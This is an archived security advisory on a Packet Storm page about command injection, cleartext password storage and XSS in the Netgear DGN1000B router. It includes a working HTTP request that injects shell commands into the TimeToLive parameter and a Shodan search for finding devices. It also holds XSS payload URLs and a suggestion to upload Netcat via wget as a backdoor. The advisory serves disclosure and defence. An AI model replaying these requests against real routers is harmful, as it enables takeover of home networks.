exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Netgear DGN1000B XSS / Command Injection

Netgear DGN1000B XSS / Command Injection
Posted Feb 8, 2013
Authored by Michael Messner

The Netgear N150 Wireless ADSL2+ Modem Router DGN1000 suffers from cross site scripting, OS command injection, and insecure cryptographic storage vulnerabilities. Firmware versions 1.1.00.24 and 1.1.00.45 are affected.

tags | exploit, vulnerability, xss
SHA-256 | dcec7c5cda6f10f1bbcd85f15e43d09cfdc1cbee7d31d660686584eb925c0e5c

Netgear DGN1000B XSS / Command Injection

Change Mirror Download
Device Name: DGN1000B
Vendor: Netgear

============ Vulnerable Firmware Releases: ============

Firmwareversion: V1.1.00.24
Firmwareversion: V1.1.00.45

Download: http://downloadcenter.netgear.com/de/product/DGN1000

============ Device Description: ============

The N150 Wireless ADSL2+ Modem Router DGN1000 provides you with an easy and secure way to set up a wireless home network with fast access to the Internet over a high-speed digital subscriber line (DSL). The N150 Modem Router has a built-in DSL modem and is compatible with all major DSL Internet service providers. The security features let you block unsafe Internet content and applications, and protect the devices that you connect to your home network.

Source: http://support.netgear.com/product/DGN1000

============ Shodan Torks ============

Shodan Search: NETGEAR DGN1000

============ Vulnerability Overview: ============

* OS Command Injection in the UPNP configuration:

The vulnerability is caused by missing input validation in the TimeToLive parameter and can be exploited to inject and execute arbitrary shell commands. It is possible to upload and execute a backdoor to compromise the device.

Param: TimeToLive
POST /setup.cgi HTTP/1.1
Host: 192.168.178.188
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.178.188/setup.cgi?next_file=upnp.htm
Authorization: Basic XXX
Content-Type: application/x-www-form-urlencoded
Content-Length: 185
Connection: close

UPnP=UPnP&AdverTime=30&TimeToLive=`%20COMMAND%20`&save=+Anwenden&todo=save&this_file=upnp.htm&next_file=upnp.htm&h_UPnP=enable&hiddenAdverTime=30&hiddenTimeToLive=4

Change the Request Methode from HTTP Post to HTTP GET:

http://192.168.178.188/setup.cgi?UPnP=UPnP&AdverTime=30&TimeToLive=`%20COMMAND%20`&save=+Anwenden&todo=save&this_file=upnp.htm&next_file=upnp.htm&h_UPnP=enable&hiddenAdverTime=30&hiddenTimeToLive=4


It is possible to cross compile Netcat and upload it via wget, adjust the permissions and execute it. Have phun ;)

Sources including needed toolchain: http://kb.netgear.com/app/answers/detail/a_id/2649
direct download: http://www.downloads.netgear.com/files/GPL/DGN1000B_VB1.00.45_GR_src.tar...

Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/DGN1000B-os-command-wget-check.png
Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/DGN1000B-r00ted.png

* Insecure Cryptographic Storage:

There is no password hashing implemented and so it is saved in plain text on the system:
cat /tmp/etc/htpasswd
admin:password

* XSS

Injecting scripts into the following parameters reveals that these parameters are not properly validated for malicious input. You need to be authenticated or you have to find other methods for inserting the malicious JavaScript code.

-> Sicherheit -> Dienste -> neuen Dienst anlegen -> Dienstname

Param: service_name

http://192.168.178.188/setup.cgi?service_name=%22%3E%3Cimg%20src=%220%22%20onerror=alert%282%29%3E&svc_type=tcp&serv_sport=1&serv_endport=2&save=Anwenden&todo=save&h_svc_type=tcp&edit=1&h_ruleSelect=0&this_file=servinfo.htm&next_file=fw_serv.htm

-> WLAN -> Zugriffsliste anpassen -> Hinzufügen -> Gerätename

Param: device

http://192.168.178.188/setup.cgi?accessLimit=accessLimit&device=%22%3E%3Cimg+src%3D%220%22+onerror=alert(2)>&wirelist_mac=01-11-22-33-44-66&h_accessLimit=enable&h_ruleSelect=0&todo=addmanual&this_file=m_access.htm&next_file=m_access.htm

Param: ssid_num

http://192.168.178.188/setup.cgi?next_file=adv_wireless.htm&ssid_num=a%22%3E%3Cscript%3Ealert%281%29%3C/script%3E&flag=1

Param: h_skeyword

http://192.168.178.188/setup.cgi?skeyword=1&cfKeyWord_Domain=&KeyWordList=0&todo=delete&this_file=keyword.htm&next_file=keyword.htm&h_skeyword=115bcf%22%3E%3Cscript%3Ealert%281%29%3C/script%3Edc575b170bc38bebe&h_KeyWordList=&h_ruleSelect=0&h_trustipenable=disable&c4_Trusted_IPAddress=

Param: cfKeyWord_Domain

http://192.168.178.188/setup.cgi?skeyword=1&cfKeyWord_Domain=5d0a9%3Cscript%3Ealert%281%29%3C/script%3E&todo=addkeyword&this_file=keyword.htm&next_file=keyword.htm&h_skeyword=1&h_KeyWordList=&h_ruleSelect=&h_trustipenable=disable&c4_Trusted_IPAddress=

============ Solution ============

No known solution available.

============ Credits ============

The vulnerability was discovered by Michael Messner
Mail: devnull#at#s3cur1ty#dot#de
Web: http://www.s3cur1ty.de
Advisory URL: http://www.s3cur1ty.de/m1adv2013-005
Twitter: @s3cur1ty_de

============ Time Line: ============

October 2012 - discovered vulnerability
15.10.2012 - Privately reported all details to vendor via email
23.10.2012 - Privately reported all details to vendor via webinterface
24.10.2012 - Netgear replied to forward the details internally
31.10.2012 - Netgear closes the case
31.10.2012 - Requested more details why the case is now closed.
31.10.2012 - Netgear responded that they will check the state of the case
06.11.2012 - Netgear requested the Serial Number of the device
08.11.2012 - Responded with the Serial Number
13.11.2012 - something goes on - I got a product registration confirmation
03.12.2012 - Case closed by Netgear - No new firmware available
16.01.2013 - Netgear contacted me again requesting to check a Beta version
22.01.2013 - Tested Beta Firmware and gave feedback to vendor
06.02.2013 - public release

===================== Advisory end =====================

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close